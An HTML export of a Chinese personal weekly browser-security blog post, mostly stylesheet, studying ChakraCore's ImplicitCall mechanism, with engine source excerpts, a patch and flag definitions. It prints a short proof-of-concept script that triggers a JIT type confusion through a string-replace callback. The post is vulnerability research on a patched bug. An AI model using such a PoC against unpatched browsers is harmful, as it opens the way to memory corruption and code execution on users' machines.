<!DOCTYPE html>
<html>
<head>
<title>浏览器安全周报   2019.12.02 - 2019.12.06</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
/* GitHub stylesheet for MarkdownPad (http://markdownpad.com) */
/* Author: Nicolas Hery - http://nicolashery.com */
/* Version: b13fe65ca28d2e568c6ed5d7f06581183df8f2ff */
/* Source: https://github.com/nicolahery/markdownpad-github */

/* RESET
=============================================================================*/

html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video {
  margin: 0;
  padding: 0;
  border: 0;
}

/* BODY
=============================================================================*/

body {
  font-family: Helvetica, arial, freesans, clean, sans-serif;
  font-size: 14px;
  line-height: 1.6;
  color: #333;
  background-color: #fff;
  padding: 20px;
  max-width: 960px;
  margin: 0 auto;
}

body>*:first-child {
  margin-top: 0 !important;
}

body>*:last-child {
  margin-bottom: 0 !important;
}

/* BLOCKS
=============================================================================*/

p, blockquote, ul, ol, dl, table, pre {
  margin: 15px 0;
}

/* HEADERS
=============================================================================*/

h1, h2, h3, h4, h5, h6 {
  margin: 20px 0 10px;
  padding: 0;
  font-weight: bold;
  -webkit-font-smoothing: antialiased;
}

h1 tt, h1 code, h2 tt, h2 code, h3 tt, h3 code, h4 tt, h4 code, h5 tt, h5 code, h6 tt, h6 code {
  font-size: inherit;
}

h1 {
  font-size: 28px;
  color: #000;
}

h2 {
  font-size: 24px;
  border-bottom: 1px solid #ccc;
  color: #000;
}

h3 {
  font-size: 18px;
}

h4 {
  font-size: 16px;
}

h5 {
  font-size: 14px;
}

h6 {
  color: #777;
  font-size: 14px;
}

body>h2:first-child, body>h1:first-child, body>h1:first-child+h2, body>h3:first-child, body>h4:first-child, body>h5:first-child, body>h6:first-child {
  margin-top: 0;
  padding-top: 0;
}

a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
  margin-top: 0;
  padding-top: 0;
}

h1+p, h2+p, h3+p, h4+p, h5+p, h6+p {
  margin-top: 10px;
}

/* LINKS
=============================================================================*/

a {
  color: #4183C4;
  text-decoration: none;
}

a:hover {
  text-decoration: underline;
}

/* LISTS
=============================================================================*/

ul, ol {
  padding-left: 30px;
}

ul li > :first-child, 
ol li > :first-child, 
ul li ul:first-of-type, 
ol li ol:first-of-type, 
ul li ol:first-of-type, 
ol li ul:first-of-type {
  margin-top: 0px;
}

ul ul, ul ol, ol ol, ol ul {
  margin-bottom: 0;
}

dl {
  padding: 0;
}

dl dt {
  font-size: 14px;
  font-weight: bold;
  font-style: italic;
  padding: 0;
  margin: 15px 0 5px;
}

dl dt:first-child {
  padding: 0;
}

dl dt>:first-child {
  margin-top: 0px;
}

dl dt>:last-child {
  margin-bottom: 0px;
}

dl dd {
  margin: 0 0 15px;
  padding: 0 15px;
}

dl dd>:first-child {
  margin-top: 0px;
}

dl dd>:last-child {
  margin-bottom: 0px;
}

/* CODE
=============================================================================*/

pre, code, tt {
  font-size: 12px;
  font-family: Consolas, "Liberation Mono", Courier, monospace;
}

code, tt {
  margin: 0 0px;
  padding: 0px 0px;
  white-space: nowrap;
  border: 1px solid #eaeaea;
  background-color: #f8f8f8;
  border-radius: 3px;
}

pre>code {
  margin: 0;
  padding: 0;
  white-space: pre;
  border: none;
  background: transparent;
}

pre {
  background-color: #f8f8f8;
  border: 1px solid #ccc;
  font-size: 13px;
  line-height: 19px;
  overflow: auto;
  padding: 6px 10px;
  border-radius: 3px;
}

pre code, pre tt {
  background-color: transparent;
  border: none;
}

kbd {
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    -moz-border-right-colors: none;
    -moz-border-top-colors: none;
    background-color: #DDDDDD;
    background-image: linear-gradient(#F1F1F1, #DDDDDD);
    background-repeat: repeat-x;
    border-color: #DDDDDD #CCCCCC #CCCCCC #DDDDDD;
    border-image: none;
    border-radius: 2px 2px 2px 2px;
    border-style: solid;
    border-width: 1px;
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    line-height: 10px;
    padding: 1px 4px;
}

/* QUOTES
=============================================================================*/

blockquote {
  border-left: 4px solid #DDD;
  padding: 0 15px;
  color: #777;
}

blockquote>:first-child {
  margin-top: 0px;
}

blockquote>:last-child {
  margin-bottom: 0px;
}

/* HORIZONTAL RULES
=============================================================================*/

hr {
  clear: both;
  margin: 15px 0;
  height: 0px;
  overflow: hidden;
  border: none;
  background: transparent;
  border-bottom: 4px solid #ddd;
  padding: 0;
}

/* TABLES
=============================================================================*/

table th {
  font-weight: bold;
}

table th, table td {
  border: 1px solid #ccc;
  padding: 6px 13px;
}

table tr {
  border-top: 1px solid #ccc;
  background-color: #fff;
}

table tr:nth-child(2n) {
  background-color: #f8f8f8;
}

/* IMAGES
=============================================================================*/

img {
  max-width: 100%
}
</style>
<style type="text/css">
.highlight  { background: #ffffff; }
.highlight .c { color: #999988; font-style: italic } /* Comment */
.highlight .err { color: #a61717; background-color: #e3d2d2 } /* Error */
.highlight .k { font-weight: bold } /* Keyword */
.highlight .o { font-weight: bold } /* Operator */
.highlight .cm { color: #999988; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #999999; font-weight: bold } /* Comment.Preproc */
.highlight .c1 { color: #999988; font-style: italic } /* Comment.Single */
.highlight .cs { color: #999999; font-weight: bold; font-style: italic } /* Comment.Special */
.highlight .gd { color: #000000; background-color: #ffdddd } /* Generic.Deleted */
.highlight .gd .x { color: #000000; background-color: #ffaaaa } /* Generic.Deleted.Specific */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .gr { color: #aa0000 } /* Generic.Error */
.highlight .gh { color: #999999 } /* Generic.Heading */
.highlight .gi { color: #000000; background-color: #ddffdd } /* Generic.Inserted */
.highlight .gi .x { color: #000000; background-color: #aaffaa } /* Generic.Inserted.Specific */
.highlight .go { color: #888888 } /* Generic.Output */
.highlight .gp { color: #555555 } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #aaaaaa } /* Generic.Subheading */
.highlight .gt { color: #aa0000 } /* Generic.Traceback */
.highlight .kc { font-weight: bold } /* Keyword.Constant */
.highlight .kd { font-weight: bold } /* Keyword.Declaration */
.highlight .kp { font-weight: bold } /* Keyword.Pseudo */
.highlight .kr { font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #445588; font-weight: bold } /* Keyword.Type */
.highlight .m { color: #009999 } /* Literal.Number */
.highlight .s { color: #d14 } /* Literal.String */
.highlight .na { color: #008080 } /* Name.Attribute */
.highlight .nb { color: #0086B3 } /* Name.Builtin */
.highlight .nc { color: #445588; font-weight: bold } /* Name.Class */
.highlight .no { color: #008080 } /* Name.Constant */
.highlight .ni { color: #800080 } /* Name.Entity */
.highlight .ne { color: #990000; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #990000; font-weight: bold } /* Name.Function */
.highlight .nn { color: #555555 } /* Name.Namespace */
.highlight .nt { color: #000080 } /* Name.Tag */
.highlight .nv { color: #008080 } /* Name.Variable */
.highlight .ow { font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mf { color: #009999 } /* Literal.Number.Float */
.highlight .mh { color: #009999 } /* Literal.Number.Hex */
.highlight .mi { color: #009999 } /* Literal.Number.Integer */
.highlight .mo { color: #009999 } /* Literal.Number.Oct */
.highlight .sb { color: #d14 } /* Literal.String.Backtick */
.highlight .sc { color: #d14 } /* Literal.String.Char */
.highlight .sd { color: #d14 } /* Literal.String.Doc */
.highlight .s2 { color: #d14 } /* Literal.String.Double */
.highlight .se { color: #d14 } /* Literal.String.Escape */
.highlight .sh { color: #d14 } /* Literal.String.Heredoc */
.highlight .si { color: #d14 } /* Literal.String.Interpol */
.highlight .sx { color: #d14 } /* Literal.String.Other */
.highlight .sr { color: #009926 } /* Literal.String.Regex */
.highlight .s1 { color: #d14 } /* Literal.String.Single */
.highlight .ss { color: #990073 } /* Literal.String.Symbol */
.highlight .bp { color: #999999 } /* Name.Builtin.Pseudo */
.highlight .vc { color: #008080 } /* Name.Variable.Class */
.highlight .vg { color: #008080 } /* Name.Variable.Global */
.highlight .vi { color: #008080 } /* Name.Variable.Instance */
.highlight .il { color: #009999 } /* Literal.Number.Integer.Long */
.pl-c {
    color: #969896;
}

.pl-c1,.pl-mdh,.pl-mm,.pl-mp,.pl-mr,.pl-s1 .pl-v,.pl-s3,.pl-sc,.pl-sv {
    color: #0086b3;
}

.pl-e,.pl-en {
    color: #795da3;
}

.pl-s1 .pl-s2,.pl-smi,.pl-smp,.pl-stj,.pl-vo,.pl-vpf {
    color: #333;
}

.pl-ent {
    color: #63a35c;
}

.pl-k,.pl-s,.pl-st {
    color: #a71d5d;
}

.pl-pds,.pl-s1,.pl-s1 .pl-pse .pl-s2,.pl-sr,.pl-sr .pl-cce,.pl-sr .pl-sra,.pl-sr .pl-sre,.pl-src,.pl-v {
    color: #df5000;
}

.pl-id {
    color: #b52a1d;
}

.pl-ii {
    background-color: #b52a1d;
    color: #f8f8f8;
}

.pl-sr .pl-cce {
    color: #63a35c;
    font-weight: bold;
}

.pl-ml {
    color: #693a17;
}

.pl-mh,.pl-mh .pl-en,.pl-ms {
    color: #1d3e81;
    font-weight: bold;
}

.pl-mq {
    color: #008080;
}

.pl-mi {
    color: #333;
    font-style: italic;
}

.pl-mb {
    color: #333;
    font-weight: bold;
}

.pl-md,.pl-mdhf {
    background-color: #ffecec;
    color: #bd2c00;
}

.pl-mdht,.pl-mi1 {
    background-color: #eaffea;
    color: #55a532;
}

.pl-mdr {
    color: #795da3;
    font-weight: bold;
}

.pl-mo {
    color: #1d3e81;
}
.task-list {
padding-left:10px;
margin-bottom:0;
}

.task-list li {
    margin-left: 20px;
}

.task-list-item {
list-style-type:none;
padding-left:10px;
}

.task-list-item label {
font-weight:400;
}

.task-list-item.enabled label {
cursor:pointer;
}

.task-list-item+.task-list-item {
margin-top:3px;
}

.task-list-item-checkbox {
display:inline-block;
margin-left:-20px;
margin-right:3px;
vertical-align:1px;
}
</style>
</head>
<body>
<h1 id="-2019-12-02-2019-12-06">浏览器安全周报 2019.12.02 - 2019.12.06</h1>
<p><strong>Author:wnagzihxa1n<br>E-Mail:wnagzihxa1n@gmail.com</strong></p>
<p>上周五笔记本送修，水果店告诉我没有配件现货，订货加维修可能要一周时间，还以为这周的安全周报没法写了，结果周日就告诉我维修完成可以去拿，这售后可以啊！</p>
<p>这周主要是看ChakraCore的一些内部机制，比如回调相关的ImplicitCall机制</p>
<p>主要是学习的elli0tn0phack师傅的文章《Chakra漏洞调试笔记1——ImplicitCall》，这一系列文章我学到了很多，当然目前只是读了几遍，其中很多的知识点我都还在一点一点的学习，这周主要把ImplicitCall机制给学习清楚了，这里也感谢elli0tn0phack师傅和Sakura师傅耐心的指导，感谢师傅们！</p>
<ul>
<li><a href="https://www.anquanke.com/post/id/180551">https://www.anquanke.com/post/id/180551</a></li></ul>
<p>elli0tn0phack师傅在今年的BlueHat Shanghai也有关于浏览器安全相关的精彩演讲《Browser Script Engine Zero Days in 2018》</p>
<ul>
<li><a href="https://images.seebug.org/archive/Browser_Script_Engine_Zero_Days_in_2018-EN.pdf">https://images.seebug.org/archive/Browser_Script_Engine_Zero_Days_in_2018-EN.pdf</a></li><li><a href="https://www.microsoft.com/en-us/videoplayer/embed/RE39Zq1">https://www.microsoft.com/en-us/videoplayer/embed/RE39Zq1</a></li></ul>
<p>这个会议的官网上有本次会议的大部分视频以及所有的Slides</p>
<ul>
<li><a href="https://www.microsoft.com/china/bluehatshanghai/2019/#Agenda">https://www.microsoft.com/china/bluehatshanghai/2019/#Agenda</a></li></ul>
<p>关于ImplicitCall机制，它是用于防止执行回调修改了JS对象，但是JIT不知道的情况，比如<code>valueOf</code>回调里修改了数组的长度，但是JIT循环的时候还是缓存的长度，那就会造成一个越界访问</p>
<p>Poc</p>
<pre><code>function main() {
    let arr = [1.1, 1.1, 1.1, 1.1, 1.1];
    function opt(f) {
        arr[0] = 1.1;
        arr[1] = 2.3023e-320 + parseInt(&#39;a&#39;.replace(&#39;a&#39;, f));
        arr[2] = 1.1;
        arr[3] = 1.1;
    }

    let r0 = () =&gt; &#39;0&#39;;
    for (var i = 0; i &lt; 0x1000; i++)
        opt(r0);

    opt(() =&gt; {
        arr[0] = {};
        return &#39;0&#39;;
    });

    print(arr[1]);
}

main();
</code></pre><p>这个漏洞的成因是因为在JITed Code里触发回调修改了数组<code>arr</code>的类型，但是JIT Compiler没有意识到这一点，导致JS层数组修改了类型，但是引擎还把数组当作浮点数数组进行赋值操作</p>
<p>正常情况下JIT Compiler是考虑了回调改变对象内存布局这种情况的，具体实现由<code>Js::Var ExecuteImplicitCall</code>来完成</p>
<pre><code>template &lt;class Fn&gt;
inline Js::Var ExecuteImplicitCall(Js::RecyclableObject * function, Js::ImplicitCallFlags flags, Fn implicitCall)
{
    // For now, we will not allow Function that is marked as HasNoSideEffect to be called, and we will just bailout.
    // These function may still throw exceptions, so we will need to add checks with RecordImplicitException
    // so that we don&#39;t throw exception when disableImplicitCall is set before we allow these function to be called
    // as an optimization.  (These functions are valueOf and toString calls for built-in non primitive types)

    Js::FunctionInfo::Attributes attributes = Js::FunctionInfo::GetAttributes(function);

    // we can hoist out const method if we know the function doesn&#39;t have side effect,
    // and the value can be hoisted.
    // 没有Side Effect的函数可以直接调用
    if (this-&gt;HasNoSideEffect(function, attributes))
    {
        // Has no side effect means the function does not change global value or
        // will check for implicit call flags
        return implicitCall();
    }

    // Don&#39;t call the implicit call if disable implicit call
    // 如果ImplicitCall被禁用表示不允许调用
    if (IsDisableImplicitCall())
    {
        AddImplicitCallFlags(flags);
        // Return &quot;undefined&quot; just so we have a valid var, in case subsequent instructions are executed
        // before we bail out.
        return function-&gt;GetScriptContext()-&gt;GetLibrary()-&gt;GetUndefined();
    }

    if ((attributes &amp; Js::FunctionInfo::HasNoSideEffect) != 0)
    {
        // Has no side effect means the function does not change global value or
        // will check for implicit call flags
        return implicitCall();
    }

    // Save and restore implicit flags around the implicit call

    // 此时明确有回调且有Side Effect，所以设置saveImplicitCallFlags的值
    Js::ImplicitCallFlags saveImplicitCallFlags = this-&gt;GetImplicitCallFlags();
    Js::Var result = implicitCall();
    this-&gt;SetImplicitCallFlags((Js::ImplicitCallFlags)(saveImplicitCallFlags | flags));
    return result;
}
</code></pre><p>函数<code>RegexHelper::StringReplace</code>实现的地方，可以看到直接调用用户定义的函数，没有做检查</p>
<pre><code>Var RegexHelper::StringReplace(JavascriptString* match, JavascriptString* input, JavascriptFunction* replacefn)
{
    CharCount indexMatched = JavascriptString::strstr(input, match, true);
    ScriptContext* scriptContext = replacefn-&gt;GetScriptContext();
    Assert(match-&gt;GetScriptContext() == scriptContext);
    Assert(input-&gt;GetScriptContext() == scriptContext);

    if (indexMatched != CharCountFlag)
    {
        Var pThis = scriptContext-&gt;GetLibrary()-&gt;GetUndefined();
        // 调用用户定义的函数
        Var replaceVar = CALL_FUNCTION(scriptContext-&gt;GetThreadContext(), replacefn, CallInfo(4), pThis, match, JavascriptNumber::ToVar((int)indexMatched, scriptContext), input);  // &lt;--
        JavascriptString* replace = JavascriptConversion::ToString(replaceVar, scriptContext);
        const char16* inputStr = input-&gt;GetString();
        const char16* prefixStr = inputStr;
        CharCount prefixLength = indexMatched;
        const char16* postfixStr = inputStr + prefixLength + match-&gt;GetLength();
        CharCount postfixLength = input-&gt;GetLength() - prefixLength - match-&gt;GetLength();
        CharCount newLength = prefixLength + postfixLength + replace-&gt;GetLength();
        BufferStringBuilder bufferString(newLength, match-&gt;GetScriptContext());
        bufferString.SetContent(prefixStr, prefixLength,
                                replace-&gt;GetString(), replace-&gt;GetLength(),
                                postfixStr, postfixLength);
        return bufferString.ToString();
    }
    return input;
}
</code></pre><p>为什么最后面的标志位可以用于判断是否有回调呢？</p>
<p>我们来看Patch后的调用，传入的是<code>ImplicitCall_Accessor</code>，对应的值是<code>0x04</code>，最后通过<code>|</code>就不是原来的值，所以JIT在检查的时候，一看<code>ImplicitCallFlags</code>不是原来的值，那就说明<code>ExecuteImplicitCall</code>判断这里存在回调，所以直接BailOut到Interpreter去解释执行</p>
<pre><code>ThreadContext* threadContext = scriptContext-&gt;GetThreadContext();
Var replaceVar = threadContext-&gt;ExecuteImplicitCall(replacefn, ImplicitCall_Accessor, [=]()-&gt;Js::Var
{
    Var pThis = scriptContext-&gt;GetLibrary()-&gt;GetUndefined();
    return CALL_FUNCTION(threadContext, replacefn, CallInfo(4), pThis, match, JavascriptNumber::ToVar((int)indexMatched, scriptContext), input);
});

enum ImplicitCallFlags : BYTE
{
    ImplicitCall_HasNoInfo = 0x00,
    ImplicitCall_None = 0x01,
    ImplicitCall_ToPrimitive = 0x02 | ImplicitCall_None,
    ImplicitCall_Accessor = 0x04 | ImplicitCall_None,
    ImplicitCall_NonProfiledAccessor = 0x08 | ImplicitCall_None,
    ImplicitCall_External = 0x10 | ImplicitCall_None,
    ImplicitCall_Exception = 0x20 | ImplicitCall_None,
    ImplicitCall_NoOpSet = 0x40 | ImplicitCall_None,
    ImplicitCall_All = 0x7F,
    ImplicitCall_AsyncHostOperation = 0x80
};
</code></pre><p>之前分析的SamsungSMT逻辑提权漏洞，详细分析写了一半后来就没动了，看看下周写完给发出来吧，我喜欢逻辑漏洞，剩下的时间多看看编译原理，现在再来看编译原理感觉能和编译器很多知识点对应上，很有趣:))</p>

</body>
</html>
<!-- This document was created with MarkdownPad, the Markdown editor for Windows (http://markdownpad.com) -->
